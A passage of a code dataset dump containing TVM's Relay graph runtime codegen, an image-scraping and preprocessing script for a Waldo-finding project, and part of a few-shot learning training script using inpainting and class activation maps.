TVM's graph format.\n\nTo connect to the graph runtime, we use a printer that converts our graph format\ninto TVM's JSON format. The resulting string can be loaded by\ncontrib.graph_runtime or any other TVM runtime comptatible system.\n\"\"\"\n\nfrom __future__ import absolute_import\nimport json\nimport attr\nfrom . import _backend\nfrom . import compile_engine\nfrom ..op import Op\nfrom ..expr import Function, GlobalVar\nfrom ..expr_functor import ExprFunctor\nfrom ..ty import TupleType, TensorType\n\n\n@attr.s\nclass NodeRef(object):\n \"\"\"A reference to a node, used for constructing the graph.\"\"\"\n ident = attr.ib()\n index = attr.ib(default=0)\n version = attr.ib(default=0)\n\n def to_json(self):\n return [self.ident, self.index, self.version]\n\n\n@attr.s\nclass Node(object):\n \"\"\"The base class for nodes in the TVM runtime system graph input.\"\"\"\n name = attr.ib()\n attrs = attr.ib()\n\n def to_json(self):\n raise Exception(\"Abstract method, please implement me.\")\n\n\n@attr.s\nclass InputNode(Node):\n \"\"\"An input node in the TVM runtime system graph input.\"\"\"\n name = attr.ib()\n attrs = attr.ib()\n\n def to_json(self):\n return {\n \"op\": \"null\",\n \"name\": self.name,\n \"inputs\": []\n }\n\n\n@attr.s\nclass OpNode(Node):\n \"\"\"An operator node in the TVM runtime system\"s graph input.\"\"\"\n op_name = attr.ib()\n inputs = attr.ib()\n op_attrs = attr.ib()\n num_outputs = attr.ib(default=1)\n\n def to_json(self):\n attrs = dict.copy(self.op_attrs)\n # Extend ops with extra info.\n attrs[\"func_name\"] = self.op_name\n attrs[\"flatten_data\"] = \"0\"\n attrs[\"num_inputs\"] = str(len(self.inputs))\n attrs[\"num_outputs\"] = str(self.num_outputs)\n\n return {\n \"op\": \"tvm_op\",\n \"name\": self.name,\n \"attrs\": attrs,\n \"inputs\": self.inputs\n }\n\n\ndef shape_to_json(shape):\n \"\"\"Convert symbolic shape to json compatible forma.\"\"\"\n return [sh.value for sh in shape]\n\n\nclass GraphRuntimeCodegen(ExprFunctor):\n \"\"\"The compiler from Relay to the TVM runtime system.\"\"\"\n nodes = attr.ib()\n var_map = attr.ib()\n\n def __init__(self, mod, target):\n ExprFunctor.__init__(self)\n self.mod = mod\n self.target = target\n self.nodes = []\n self.var_map = {}\n self.params = {}\n self.storage_map = None\n self.compile_engine = compile_engine.get()\n self.lowered_funcs = set()\n self._name_map = {}\n\n def add_node(self, node, expr):\n \"\"\"\n Add a node to the graph.\n\n Parameters\n ----------\n node: Node\n The node to add to the graph.\n\n expr: tvm.relay.Expr\n The corresponding expression.\n\n Returns\n -------\n node_ref: Union[NodeRef, List[NodeRef]]\n A reference to the node.\n \"\"\"\n checked_type = expr.checked_type\n # setup storage ids\n assert expr in self.storage_map\n node.attrs[\"storage_id\"] = [\n x.value for x in self.storage_map[expr]\n ]\n\n node_id = len(self.nodes)\n self.nodes.append(node)\n # Tuple return value, flatten as tuple\n if isinstance(checked_type, TupleType):\n ret = []\n shape = []\n dtype = []\n for i, typ in enumerate(checked_type.fields):\n if not isinstance(typ, TensorType):\n raise RuntimeError(\"type %s not supported\" % typ)\n ret.append(NodeRef(node_id, i))\n shape.append(shape_to_json(typ.shape))\n dtype.append(typ.dtype)\n node.attrs[\"shape\"] = shape\n node.attrs[\"dtype\"] = dtype\n assert isinstance(node, OpNode)\n node.num_outputs = len(checked_type.fields)\n return tuple(ret)\n # Normal tensor return type\n if not isinstance(checked_type, TensorType):\n raise RuntimeError(\"type %s not supported\" % checked_type)\n node.attrs[\"shape\"] = [shape_to_json(checked_type.shape)]\n node.attrs[\"dtype\"] = [checked_type.dtype]\n node.num_outputs = 1\n return NodeRef(node_id, 0)\n\n def visit_tuple(self, vtuple):\n fields = []\n for field in vtuple.fields:\n ref = self.visit(field)\n assert isinstance(ref, NodeRef)\n fields.append(ref)\n return tuple(fields)\n\n def visit_tuple_getitem(self, op):\n vtuple = self.visit(op.tuple_value)\n assert isinstance(vtuple, tuple)\n return vtuple[op.index]\n\n def visit_constant(self, op):\n index = len(self.params)\n name = \"p%d\" % index\n self.params[name] = op.data\n node = InputNode(name, {})\n return self.add_node(node, op)\n\n def visit_function(self, _):\n raise RuntimeError(\"function not supported\")\n\n def visit_if(self, _):\n raise RuntimeError(\"if not supported\")\n\n def visit_global_var(self, _):\n raise RuntimeError()\n\n def visit_let(self, let):\n \"\"\"\n Visit the let binding, by first traversing its value,\n then setting the metadata on the returned NodeRef.\n\n Finally visit the body, and return the NodeRef corresponding\n to it.\n\n Parameters\n ----------\n let: tvm.relay.Expr\n The let binding to transform.\n\n Returns\n -------\n ref: NodeRef\n The node reference to the body.\n \"\"\"\n assert let.var not in self.var_map\n self.var_map[let.var] = self.visit(let.value)\n return self.visit(let.body)\n\n def visit_var(self, rvar):\n return self.var_map[rvar]\n\n def visit_call(self, call):\n \"\"\"Transform a ::tvm.relay.Call into an operator in the TVM graph.\"\"\"\n if isinstance(call.op, Op):\n raise Exception(\n \"Operators should be transformed away; try applying\" +\n \"the fuse_ops transformation to the expression.\")\n elif isinstance(call.op, GlobalVar):\n func = self.mod[call.op]\n elif isinstance(call.op, Function):\n func = call.op\n else:\n raise Exception(\n \"TVM runtime does not support calls to {0}\".format(type(call.op)))\n if int(func.attrs.Primitive) != 1:\n raise Exception(\n \"TVM only support calls to primitive functions \" +\n \"(i.e functions composed of fusable operator invocations)\")\n\n cached_func = self.compile_engine.lower(func, self.target)\n for loweredf in cached_func.funcs:\n self.lowered_funcs.add(loweredf)\n\n inputs = []\n # flatten tuple in the call.\n for arg in call.args:\n res = self.visit(arg)\n if isinstance(arg.checked_type, TupleType):\n assert isinstance(res, tuple)\n inputs += res\n else:\n inputs.append(res)\n\n inputs = [x.to_json() for x in inputs]\n op_name = cached_func.func_name\n op_node = OpNode(self._get_unique_name(op_name), {},\n op_name, inputs, {})\n return self.add_node(op_node, call)\n\n def visit_op(self, _):\n raise Exception(\"can not compile op in non-eta expanded form\")\n\n def _get_json(self):\n \"\"\"\n Convert the sequence of nodes stored by the compiler into the\n TVM graph runtime format.\n\n Returns\n -------\n graph_json : str\n The generated JSON as a string.\n \"\"\"\n nodes = []\n # First we compute \"nodes\" field.\n for node in self.nodes:\n nodes.append(node.to_json())\n\n arg_nodes = []\n # Compute \"arg_nodes\" and \"heads\" fields.\n for i, node in enumerate(self.nodes):\n if isinstance(node, InputNode):\n arg_nodes.append(i)\n\n heads = self.heads\n heads = heads if isinstance(heads, tuple) else [heads]\n heads = [x.to_json() for x in heads]\n\n # Compute \"node_row_ptr\" and entry attributes.\n num_entry = 0\n shapes = []\n storage_ids = []\n dltypes = []\n node_row_ptr = [0]\n for node in self.nodes:\n assert node.num_outputs == len(node.attrs[\"shape\"])\n shapes += node.attrs[\"shape\"]\n dltypes += node.attrs[\"dtype\"]\n storage_ids += node.attrs[\"storage_id\"]\n num_entry += node.num_outputs\n node_row_ptr.append(num_entry)\n\n # Compute \"attrs\" field.\n attrs = {}\n attrs[\"shape\"] = [\"list_shape\", shapes]\n attrs[\"storage_id\"] = [\"list_int\", storage_ids]\n attrs[\"dltype\"] = [\"list_str\", dltypes]\n\n json_dict = {\n \"nodes\": nodes,\n \"arg_nodes\": arg_nodes,\n \"heads\": heads,\n \"attrs\": attrs,\n \"node_row_ptr\": node_row_ptr\n }\n\n return json.dumps(json_dict, indent=2)\n\n def debug_dump_memory_plan(self, func):\n \"\"\"Debug function to dump memory plan.\"\"\"\n def _annotate(expr):\n if expr in self.storage_map:\n return str(self.storage_map[expr])\n return \"\"\n return func.astext(show_meta_data=False, annotate=_annotate)\n\n def codegen(self, func):\n \"\"\"Compile a single function into a graph.\n\n Parameters\n ----------\n func: tvm.relay.Expr\n The function to compile.\n\n Returns\n -------\n graph_json : str\n The graph json that can be consumed by runtime.\n\n lowered_funcs : List[tvm.LoweredFunc]\n The lowered functions.\n\n params : Dict[str, tvm.nd.NDArray]\n Additional constant parameters.\n \"\"\"\n self.storage_map = _backend.GraphPlanMemory(func)\n # First we convert all the parameters into input nodes.\n for param in func.params:\n node = InputNode(param.name_hint, {})\n self.var_map[param] = self.add_node(\n node, param)\n\n # Then we compile the body into a graph which can depend\n # on input variables.\n self.heads = self.visit(func.body)\n graph_json = self._get_json()\n lowered_funcs = list(self.lowered_funcs)\n return graph_json, lowered_funcs, self.params\n\n def _get_unique_name(self, name):\n if name not in self._name_map:\n self._name_map[name] = 1\n return name\n index = self._name_map[name]\n self._name_map[name] += 1\n return self._get_unique_name(name + str(index))\n","sub_path":"python/tvm/relay/backend/graph_runtime_codegen.py","file_name":"graph_runtime_codegen.py","file_ext":"py","file_size_in_byte":11210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"77412970","text":"import urllib.parse\nimport requests\nfrom requests.auth import HTTPBasicAuth\nfrom tqdm import tqdm\nimport os\nfrom PIL import Image, ImageChops, ImageOps\nimport math\nimport numpy as np\n\n\n# Please don't run this function unless you have to. There's a limit of 5000 requests per month. #\ndef bing_api(query_array, size_threshold, source_type, top, format):\n \"\"\"Returns the decoded json response content\n\n :param query: query for search\n :param source_type: type for seacrh result\n :param top: number of search result\n :param format: format of search result\n\n A lot of this code shamelessly borrowed from: https://xyang.me/using-bing-search-api-in-python/\n \"\"\"\n\n # Bing API key.\n API_KEY = \"INSERT YOUR API KEY\"\n\n for i in query_array:\n # set search url\n query = '%27' + urllib.parse.quote(i) + '%27'\n # web result only base url\n base_url = 'https://api.datamarket.azure.com/Bing/Search/' + source_type\n url = base_url + '?Query=' + query + '&$top=' + str(top) + '&$format=' + format\n\n # create credential for authentication\n user_agent = \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36\"\n # create auth object\n auth = HTTPBasicAuth(API_KEY, API_KEY)\n # set headers\n headers = {'User-Agent': user_agent}\n\n # get response from search url\n response_data = requests.get(url, headers=headers, auth=auth)\n # decode json response content\n json_result = response_data.json()\n\n # set the image counter to 0\n image_counter = 0\n # for the results in the json object\n for result in tqdm(range(0, top - 1)):\n # get the width of the image\n try:\n width = int(json_result['d']['results'][result]['Width'])\n except IndexError:\n print('Error with image.')\n continue\n # if width greater than threshold\n if width > size_threshold:\n # download the urls to the image url array\n image_url = json_result['d']['results'][result]['MediaUrl']\n image_counter += 1\n # open the source\n with open('raw-images/' + i + '-' + str(image_counter) + '.jpg', \"wb\") as file:\n # get request\n response = requests.get(image_url)\n # write the file\n file.write(response.content)\n\n\n# bing_api([\"Waldo\"], 1024, 'Image', 50, 'json')\n\n\n# make all the images square and of same size\ndef crop_and_size(input_file_path, output_file_path, dimensions):\n # create a directory if it does not exist\n if not os.path.exists(output_file_path):\n os.makedirs(output_file_path)\n for image in os.listdir(input_file_path):\n if image != '.DS_Store':\n img = Image.open(input_file_path + '/' + image)\n cropped_and_sized = ImageOps.fit(img, dimensions, Image.ANTIALIAS)\n cropped_and_sized.save(output_file_path + '/' + image, 'JPEG')\n\n\n# crop_and_size('raw-images', 'cropped-and-resized', (1024, 1024))\n\n\n# chops the images into smaller images for use\ndef chop(x_div, y_div, input_file_path, output_file_path):\n # create a directory if it does not exist\n if not os.path.exists(output_file_path):\n os.makedirs(output_file_path)\n counter = 1\n for image in tqdm(os.listdir(input_file_path)):\n if image != '.DS_Store':\n img = Image.open(input_file_path + '/' + image)\n (imageWidth, imageHeight) = img.size\n gridx = x_div\n gridy = y_div\n rangex = int(imageWidth / gridx)\n rangey = int(imageHeight / gridy)\n for x in range(rangex):\n for y in range(rangey):\n bbox = (x * gridx, y * gridy, x * gridx + gridx, y * gridy + gridy)\n slice_bit = img.crop(bbox)\n slice_bit.save(output_file_path + '/' + str(counter) + '_' + str(x) + '_' + str(y) + '.jpg',\n optimize=True, bits=6)\n counter += 1\n\ndef split(x_div, y_div, input_file_path, output_file_path):\n # create a directory if it does not exist\n if not os.path.exists(output_file_path):\n os.makedirs(output_file_path)\n counter = 1\n for image in tqdm(os.listdir(input_file_path)):\n if image != '.DS_Store':\n img = Image.open(input_file_path + '/' + image)\n (imageWidth, imageHeight) = img.size\n gridx = x_div\n gridy = y_div\n rangex = imageWidth - gridx\n rangey = imageHeight - gridy\n for x in range(0, rangex, 2):\n for y in range(0, rangey, 2):\n bbox = (x, y, x + gridx, y + gridy)\n slice_bit = img.crop(bbox)\n slice_bit.save(output_file_path + '/' + str(counter) + '_' + str(x) + '_' + str(y) + '.jpg',\n optimize=True, bits=6)\n counter += 1\n\n\n# chop(128, 128, 'cropped-and-resized', 'chopped-128')\n\n\n# flips the images horizontally\ndef flip_horizontally(input_file_path, output_file_path):\n # create a directory if it does not exist\n if not os.path.exists(output_file_path):\n os.makedirs(output_file_path)\n counter = 1\n for image in tqdm(os.listdir(input_file_path)):\n if image != '.DS_Store':\n # open the image and transpose horizontally\n flipped = Image.open(input_file_path + '/' + image).transpose(Image.FLIP_LEFT_RIGHT)\n # save the image\n flipped.save(output_file_path + '/' + str(counter) + '-flip' + '.jpg', optimize=True, bits=6)\n counter += 1\n\n\n# flip_horizontally('chopped', 'chopped-flipped')\n\n# desaturates the images\ndef desaturate(input_file_path, output_file_path):\n # create a directory if it does not exist\n if not os.path.exists(output_file_path):\n os.makedirs(output_file_path)\n for image in tqdm(os.listdir(input_file_path)):\n if image != '.DS_Store':\n # open the image and convert to grayscale\n desaturated = Image.open(input_file_path + '/' + image).convert('1')\n # convert back to rgb\n desaturated = desaturated.convert('RGB')\n # save the image\n desaturated.save(output_file_path + '/' + image, optimize=True, bits=6)\n\n\n# desaturate('chopped-64', 'chopped-64-gray')\n\n\n# converts the images to black OR white\ndef black_or_white(input_file_path, output_file_path):\n # create a directory if it does not exist\n if not os.path.exists(output_file_path):\n os.makedirs(output_file_path)\n for image in tqdm(os.listdir(input_file_path)):\n if image != '.DS_Store':\n # open the image and convert to black or white\n desaturated = Image.open(input_file_path + '/' + image).convert('L')\n bw = np.asarray(desaturated).copy()\n # pixel range is 0...255, 256/2 = 128\n bw[bw < 128] = 0 # Black\n bw[bw >= 128] = 255 # White\n # get the image from the converted array\n imfile = Image.fromarray(bw)\n # convert back to rgb\n imfile = imfile.convert('RGB')\n # save the image\n imfile.save(output_file_path + '/' + image, optimize=True, bits=6)\n\n\n# black_or_white('chopped-128', 'chopped-128-bw')\n\ndef process_img_to_bw(img_location, chop_size):\n img = Image.open(img_location)\n cropped_and_sized = ImageOps.fit(img, (1024,1024), Image.ANTIALIAS)\n original_image = np.asarray( cropped_and_sized, dtype=\"int32\" )\n (imageWidth, imageHeight) = cropped_and_sized.size\n rangex = int(imageWidth / chop_size)\n rangey = int(imageHeight / chop_size)\n images = []\n for x in range(rangex):\n for y in range(rangey):\n bbox = (x * chop_size, y * chop_size, x * chop_size + chop_size, y * chop_size + chop_size)\n slice_bit = cropped_and_sized.crop(bbox)\n bw = np.asarray(slice_bit).copy()\n # pixel range is 0...255, 256/2 = 128\n bw[bw < 128] = 0 # Black\n bw[bw >= 128] = 255 # White\n # get the image from the converted array\n imfile = Image.fromarray(bw)\n # convert back to rgb\n imfile = imfile.convert('RGB')\n # save the image\n images.append(imfile)\n as_list = []\n for img in images:\n asarr = np.asarray( img, dtype=\"int32\" )\n as_list.append(list(asarr))\n img.close()\n return np.asarray(as_list), original_image\n\ndef process_img(img_location, chop_size):\n img = Image.open(img_location)\n # cropped_and_sized = ImageOps.fit(img, (1024,1024), Image.ANTIALIAS)\n original_image = np.asarray( img, dtype=\"int32\" )\n (imageWidth, imageHeight) = img.size\n rangex = int(imageWidth / chop_size)\n rangey = int(imageHeight / chop_size)\n images = []\n for x in range(rangex):\n for y in range(rangey):\n bbox = (x * chop_size, y * chop_size, x * chop_size + chop_size, y * chop_size + chop_size)\n slice_bit = img.crop(bbox)\n # save the image\n images.append(slice_bit)\n as_list = []\n for img in images:\n asarr = np.asarray( img, dtype=\"int32\" )\n as_list.append(list(asarr))\n img.close()\n return np.asarray(as_list), original_image, (imageWidth, imageHeight)\n","sub_path":"tyler/image_processing.py","file_name":"image_processing.py","file_ext":"py","file_size_in_byte":9501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"125945509","text":"from __future__ import print_function\nfrom __future__ import division\n\nimport os\nimport sys\nimport time\nfrom PIL import Image\nimport datetime\nimport argparse\nimport os.path as osp\nimport numpy as np\nimport random\nimport cv2\nfrom scipy.misc import imread\nfrom skimage.feature import canny\nfrom skimage.color import rgb2gray, gray2rgb\n\nimport torch\nimport torch.nn as nn\nimport torch.backends.cudnn as cudnn\nfrom torch.utils.data import DataLoader\nfrom torch.optim import lr_scheduler\nimport torch.nn.functional as F\nimport torchvision.transforms.functional as Funljj\nsys.path.append('./torchFewShot')\n\n#from args_tiered import argument_parser\nfrom args_xent import argument_parser\n#from torchFewShot.models.net import Model\n\nfrom torchFewShot.models.models_gnn import create_models\nfrom torchFewShot.data_manager_imageori import DataManager\n#from torchFewShot.data_manager import DataManager\nfrom torchFewShot.losses import CrossEntropyLoss\nfrom torchFewShot.optimizers import init_optimizer\nimport transforms as T\nfrom torchFewShot.utils.iotools import save_checkpoint, check_isfile\nfrom torchFewShot.utils.avgmeter import AverageMeter\nfrom torchFewShot.utils.logger import Logger\nfrom torchFewShot.utils.torchtools import one_hot, adjust_learning_rate\n\nsys.path.append('/home/lijunjie/edge-connect-master')\nfrom shutil import copyfile\nfrom src.config import Config\nfrom src.edge_connect_few_shot import EdgeConnect\n\n#config = load_config(mode)\nconfig_path = os.path.join('/home/lijunjie/edge-connect-master/checkpoints/places2_authormodel', 'config.yml')\nconfig = Config(config_path)\nconfig.TEST_FLIST = '/home/lijunjie/edge-connect-master/examples/test_result/'\nconfig.TEST_MASK_FLIST = '/home/lijunjie/edge-connect-master/examples/places2/masks'\nconfig.RESULTS = './checkpoints/EC_test'\nconfig.MODE = 2\nif config.MODE == 2:\n config.MODEL = 3\n config.INPUT_SIZE = 0\n config.mask_id=2\n #if args.input is not None:\n #config.TEST_FLIST = args.input\n\n #if args.mask is not None:\n #config.TEST_MASK_FLIST = args.mask\n\n #if args.edge is not None:\n #config.TEST_EDGE_FLIST = args.edge\n\n #if args.output is not None:\n #config.RESULTS = args.output\n#exit(0)\n\n\nparser = argument_parser()\nargs = parser.parse_args()\n#print(args.use_similarity)\n#exit(0)\nif args.use_similarity:\n from torchFewShot.models.net_similary import Model\nelse:\n from torchFewShot.models.net import Model_mltizhixin , Model_tradi\n #print('enter ori net')\n #exit(0)\n \nonly_test=False\ndef returnCAM(feature_conv, weight_softmax, class_idx,output_cam ):\n # generate the class activation maps upsample to 256x256\n size_upsample = (84, 84)\n nc, h, w = feature_conv.shape\n #output_cam = []\n #print(class_idx)\n #exit(0)\n #print(class_idx, nc, h, w,weight_softmax[class_idx[0]].shape)\n #print(feature_conv.shape)\n #print(class_idx)\n #exit(0)\n cam_imgs_resize=[]\n for idx in class_idx[0]:\n #idx=int(idx)\n #print(idx)\n #exit(0)\n #print( weight_softmax[idx].shape,feature_conv.reshape((nc, h*w)).shape)\n #exit(0)\n cam = weight_softmax[idx].dot(feature_conv.reshape((nc, h*w)))\n cam = cam.reshape(h, w)\n cam = cam - np.min(cam)\n cam_img = cam / np.max(cam)\n #cam_img = np.uint8((255 * cam_img)>200)*255\n cam_img = np.uint8(255 * cam_img)\n cam_img_resize=cv2.resize(cam_img, size_upsample)\n cam_img_resize = np.uint8((cam_img_resize)>200)*255\n #cv2.imwrite('./mask.jpg',cam_img*255)\n #exit(0)\n #print(cam_img.sum())\n #exit(0)\n #cam_img = np.uint8(255 * cam_img)\n mask_tensor=Funljj.to_tensor(Image.fromarray(cam_img_resize)).float()\n #print(mask_tensor.sum()) \n #exit(0) \n output_cam.append(mask_tensor)\n cam_imgs_resize.append(cam_img_resize)\n return output_cam,cam_imgs_resize\ndef main():\n #os.system('cp ./train_with_inpaint_read_from_data.py ' +args.save_dir + 'train_with_inpaint_read_from_data.py')\n ##os.system('cp ./net/network_ori.py '+config.tensorboard_folder + 'network_ori.py.backup') \n #os.system('cp ./net/network_test.py '+config.tensorboard_folder + 'network_test.py.backup') \n torch.manual_seed(args.seed)\n os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu_devices\n use_gpu = torch.cuda.is_available()\n config.DEVICE = torch.device(\"cuda\")\n torch.backends.cudnn.benchmark = True \n #torch.manual_seed(config.SEED)\n \n #torch.cuda.manual_seed_all(config.SEED)\n np.random.seed(args.seed)\n random.seed(args.seed)\n sys.stdout = Logger(osp.join(args.save_dir, 'log_train.txt'))\n print(\"==========\\nArgs:{}\\n==========\".format(args))\n\n if use_gpu:\n print(\"Currently using GPU {}\".format(args.gpu_devices))\n cudnn.benchmark = True\n torch.cuda.manual_seed_all(args.seed)\n else:\n print(\"Currently using CPU (GPU is highly recommended)\")\n \n print('Initializing image data manager')\n dm = DataManager(args, use_gpu)\n trainloader, testloader = dm.return_dataloaders()\n model_edge = EdgeConnect(config)\n model_edge.load() \n print('\\nstart testing...\\n')\n #model_edge.test()\n #print(args.scale_cls,args.num_classes)\n #exit(0)\n #GNN_model=create_models(args,512)\n #print(args.use_similarity)\n #exit(0)\n if args.use_similarity:\n GNN_model=create_models(args,512) \n model = Model(args,GNN_model,scale_cls=args.scale_cls, num_classes=args.num_classes)\n else:\n model = Model_mltizhixin(scale_cls=args.scale_cls, num_classes=args.num_classes)\n model_tradclass = Model_tradi(scale_cls=args.scale_cls, num_classes=args.num_classes)\n params_tradclass = torch.load('result/%s/CAM/1-shot-seed112_classic_classifier_avg_nouse_CAN/%s' % (args.dataset, 'best_model.pth.tar')) \n model_tradclass.load_state_dict(params_tradclass['state_dict']) \n #params = torch.load('result/%s/CAM/1-shot-seed112_inpaint_use_CAM/%s' % (args.dataset, 'checkpoint_inpaint67.pth.tar')) \n #model.load_state_dict(params['state_dict']) \n #print('enter model_tradclass')\n #exit(0)\n if False:\n params = torch.load('result/%s/CAM/1-shot-seed112/%s' % (args.dataset, 'best_model.pth.tar'))\n params_tradclass = torch.load('result/%s/CAM/1-shot-seed112_classic_classifier_global_avg/%s' % (args.dataset, 'checkpoint_inpaint67.pth.tar')) \n print(type(params))\n #exit(0)\n #for key in params.keys():\n #print(type(key))\n #exit(0)\n #model.load_state_dict(params['state_dict'])\n model_tradclass.load_state_dict(params_tradclass['state_dict']) \n #exit(0)\n #for ind,i in model.state_dict().items():\n #print (ind,i.shape)\n #exit(0)\n params = list(model_tradclass.parameters()) \n #fc_params=params[-2]\n weight_softmax = np.squeeze(params[-2].data.numpy())\n #print(weight_softmax.shape,type(params[-2]),params[-2].shape,params[-2].data.shape)\n #exit(0)\n criterion = CrossEntropyLoss()\n optimizer = init_optimizer(args.optim, model.parameters(), args.lr, args.weight_decay)\n #optimizer_tradclass = init_optimizer(args.optim, model_tradclass.parameters(), args.lr, args.weight_decay) \n #model_tradclass\n\n if use_gpu:\n model = model.cuda()\n model_tradclass = model_tradclass.cuda() \n\n start_time = time.time()\n train_time = 0\n best_acc = -np.inf\n best_epoch = 0\n print(\"==> Start training\")\n\n for epoch in range(args.max_epoch):\n if not args.Classic:\n learning_rate = adjust_learning_rate(optimizer, epoch, args.LUT_lr)\n else:\n optimizer_tradclass = init_optimizer(args.optim, model_tradclass.parameters(), args.lr, args.weight_decay)\n learning_rate = adjust_learning_rate(optimizer_tradclass, epoch, args.LUT_lr) \n #print('enter optimizer_tradclass')\n #exit(0)\n\n start_train_time = time.time()\n #exit(0)\n #print(not True)\n #exit(0)\n if not only_test:\n #print(';;;;;;;;;;;')\n #exit(0)\n if not args.Classic:\n print('enter train code')\n train(epoch,model_edge, model, model_tradclass,weight_softmax, criterion, optimizer, trainloader, learning_rate, use_gpu)\n #print('oooo')\n else:\n acc=train(epoch,model_edge, model_tradclass, criterion, optimizer_tradclass, trainloader, learning_rate, use_gpu)\n \n train_time += round(time.time() - start_train_time)\n \n if epoch == 0 or epoch > (args.stepsize[0]-1) or (epoch + 1) % 10 == 0:\n print('enter test code')\n #exit(0)\n if not args.Classic:\n #acc = test(model_edge, model, model_tradclass,weight_softmax, testloader, use_gpu)\n acc = test_ori(model, testloader, use_gpu)\n is_best = acc > best_acc\n #else:\n \n \n #print(acc)\n #exit(0)\n if is_best:\n best_acc = acc\n best_epoch = epoch + 1\n if not only_test:\n if not args.Classic:\n save_checkpoint({\n 'state_dict': model.state_dict(),\n 'acc': acc,\n 'epoch': epoch,\n }, is_best, osp.join(args.save_dir, 'checkpoint_inpaint' + str(epoch + 1) + '.pth.tar'))\n if args.Classic: \n save_checkpoint({\n 'state_dict': model_tradclass.state_dict(),\n 'acc': acc,\n 'epoch': epoch,\n }, is_best, osp.join(args.save_dir, 'checkpoint_classic' + str(epoch + 1) + '.pth.tar')) \n\n print(\"==> Test 5-way Best accuracy {:.2%}, achieved at epoch {}\".format(best_acc, best_epoch))\n\n elapsed = round(time.time() - start_time)\n elapsed = str(datetime.timedelta(seconds=elapsed))\n train_time = str(datetime.timedelta(seconds=train_time))\n print(\"Finished. Total elapsed time (h:m:s): {}. Training time (h:m:s): {}.\".format(elapsed, train_time))\n print(\"==========\\nArgs:{}\\n==========\".format(args))\n\nfrom skimage.feature import canny\nfrom skimage.color import rgb2gray, gray2rgb\ndef load_edge( img, mask):\n sigma = 2\n index=1\n # in test mode images are masked (with masked regions),\n # using 'mask' parameter prevents canny to detect edges for the masked regions\n mask = None if False else (1 - mask / 255).astype(np.bool)\n #mask =(1 - mask / 255).astype(np.bool)\n # canny\n if True:\n # no edge\n if sigma == -1:\n return np.zeros(img.shape).astype(np.float)\n\n # random sigma\n if sigma == 0:\n sigma = random.randint(1, 4)\n\n return canny(img, sigma=sigma, mask=mask).astype(np.float)\n\n # external\n else:\n imgh, imgw = img.shape[0:2]\n edge = imread(self.edge_data[index])\n edge = self.resize(edge, imgh, imgw)\n\n # non-max suppression\n if self.nms == 1:\n edge = edge * canny(img, sigma=sigma, mask=mask)\n\n return edge\n \n \ndef read_image(img_path):\n \"\"\"Keep reading image until succeed.\n This can avoid IOError incurred by heavy IO process.\"\"\"\n got_img = False\n if not osp.exists(img_path):\n raise IOError(\"{} does not exist\".format(img_path))\n while not got_img:\n try:\n img = Image.open(img_path).convert('RGB')\n got_img = True\n except IOError:\n print(\"IOError incurred when reading '{}'. Will redo. Don't worry. Just chill.\".format(img_path))\n pass\n return img \ntransform_test = T.Compose([\n T.Resize((args.height, args.width), interpolation=3),\n T.ToTensor(),\n T.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),\n ]) \ndef train(epoch,model_edge, model, model_tradclass,weight_softmax, criterion, optimizer, trainloader, learning_rate, use_gpu):\n \n if not os.path.isdir(\"/data4/lijunjie/mini-imagenet-tools/processed_images/mask/train_1\"):\n os.mkdir(\"/data4/lijunjie/mini-imagenet-tools/processed_images/mask/train_1\")\n if not os.path.isdir(\"/data4/lijunjie/mini-imagenet-tools/processed_images/mask/train_2\"): \n os.mkdir(\"/data4/lijunjie/mini-imagenet-tools/processed_images/mask/train_2\")\n if not os.path.isdir(\"/data4/lijunjie/mini-imagenet-tools/processed_images/mask/train_3\"): \n os.mkdir(\"/data4/lijunjie/mini-imagenet-tools/processed_images/mask/train_3\")\n if not os.path.isdir(\"/data4/lijunjie/mini-imagenet-tools/processed_images/mask/train_4\"): \n os.mkdir(\"/data4/lijunjie/mini-imagenet-tools/processed_images/mask/train_4\")\n if not os.path.isdir(\"/data4/lijunjie/mini-imagenet-tools/processed_images/mask/train_full\"): \n os.mkdir(\"/data4/lijunjie/mini-imagenet-tools/processed_images/mask/train_full\")\n if not os.path.isdir(\"/data4/lijunjie/mini-imagenet-tools/processed_images/train_full\"): \n os.mkdir(\"/data4/lijunjie/mini-imagenet-tools/processed_images/train_full\") \n losses = AverageMeter()\n batch_time = AverageMeter()\n data_time = AverageMeter()\n std=np.expand_dims(np.array([0.229, 0.224, 0.225]),axis=1)\n std=np.expand_dims(std,axis=2) \n mean=np.expand_dims(np.array([0.485, 0.456, 0.406]),axis=1) \n mean=np.expand_dims(mean,axis=2) \n model.eval()\n #model_edge.eval()\n model_tradclass.eval()\n end = time.time()\n #print('llllllllllllll','located in train_with_inpaint_final.py at 264')\n #exit(0)\n for root, dirs, _ in os.walk('/data4/lijunjie/mini-imagenet-tools/processed_images/train'):\n #for f in files:\n #print(os.path.join(root, f))\n\n for d in dirs:\n path=os.path.join(root, d)\n path_1=path.replace('train','mask/train_1')\n path_2=path.replace('train','mask/train_2')\n path_3=path.replace('train','mask/train_3')\n path_4=path.replace('train','mask/train_4')\n path_5=path.replace('train','mask/train_full') \n path_6=path.replace('train','train_full') \n if not os.path.isdir(path_1): \n os.mkdir(path_1)\n os.mkdir(path_2)\n os.mkdir(path_3)\n os.mkdir(path_4)\n os.mkdir(path_5)\n os.mkdir(path_6) \n files = os.listdir(path) \n #images=[]\n #imgs_gray=[]\n #Xt_img_ori=[]\n Paths=[]\n Paths.append(path_1)\n Paths.append(path_2)\n Paths.append(path_3)\n Paths.append(path_4) \n Paths.append(path_5)\n Paths.append(path_6) \n for file in files:\n images=[]\n imgs_gray=[]\n Xt_img_ori=[] \n img_ori = read_image(os.path.join(path, file))\n #print(file)\n #exit(0)\n masked_img=np.array(img_ori)#*(1-mask_3)+mask_3*255\n masked_img=Image.fromarray(masked_img)\n masked_img_tensor=Funljj.to_tensor(masked_img).float() \n Xt_img_ori.append(masked_img_tensor)\n img = transform_test(img_ori)\n img_gray = rgb2gray(np.array(img_ori))\n img_gray=Image.fromarray(img_gray)\n img_gray_tensor=Funljj.to_tensor(img_gray).float() \n imgs_gray.append(img_gray_tensor) \n images.append(img)\n images = torch.stack(images, dim=0)\n imgs_gray = torch.stack(imgs_gray, dim=0) \n 